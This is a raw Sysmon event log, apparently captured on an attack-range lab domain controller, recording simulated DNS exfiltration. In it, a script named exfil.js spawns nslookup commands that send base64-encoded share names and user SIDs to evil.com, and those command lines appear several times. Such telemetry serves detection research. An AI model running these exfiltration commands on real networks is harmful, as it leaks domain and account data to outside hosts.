14:16:06.000{2E1864BB-17A5-629A-B53D-000000005F02}78886024C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-B73D-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.012{2E1864BB-17A6-629A-B73D-000000005F02}420C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-B53D-000000005F02}7888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhzmpl.tmp 2>&1 23542300x800000000000000043909Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:07.526{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA21A66BE7FFFBB76E82724DF03172EB,SHA256=96E79D2B83DB16FFB97C8DF19E2C6E05BE067D9275FA5B5A241FA5540CA70965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.984{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhbghc.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.984{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDAD0386F4608D3D3292EDDCB8DF387C,SHA256=4496DD660234F9CD1B209084FB4B5AA6FE4A6902F3A6C38EC7DC02A270DF4AE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.968{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE05D9A99A5E6E3E413A7132242EFDA,SHA256=27C126E9AF01A2BB8164A5F084E74F03277C233417CE6790217EC7F1B170A405,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-17A7-629A-EC3D-000000005F02}60087300C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-ED3D-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-ED3D-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.952{2E1864BB-17A7-629A-EB3D-000000005F02}52164804C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-ED3D-000000005F02}4012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.960{2E1864BB-17A7-629A-ED3D-000000005F02}4012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-EB3D-000000005F02}5216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhbghc.tmp 2>&1 10341000x8000000000000000194686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.937{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-EC3D-000000005F02}6008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.937{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-EC3D-000000005F02}6008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.937{2E1864BB-17A7-629A-EC3D-000000005F02}60087300C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-EB3D-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.921{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-EC3D-000000005F02}6008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-EB3D-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-17A1-629A-783D-000000005F02}5552724C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-EB3D-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.919{2E1864BB-17A7-629A-EB3D-000000005F02}5216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhbghc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.905{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoadw.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-17A7-629A-E93D-000000005F02}21042088C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-EA3D-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.884{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-EA3D-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 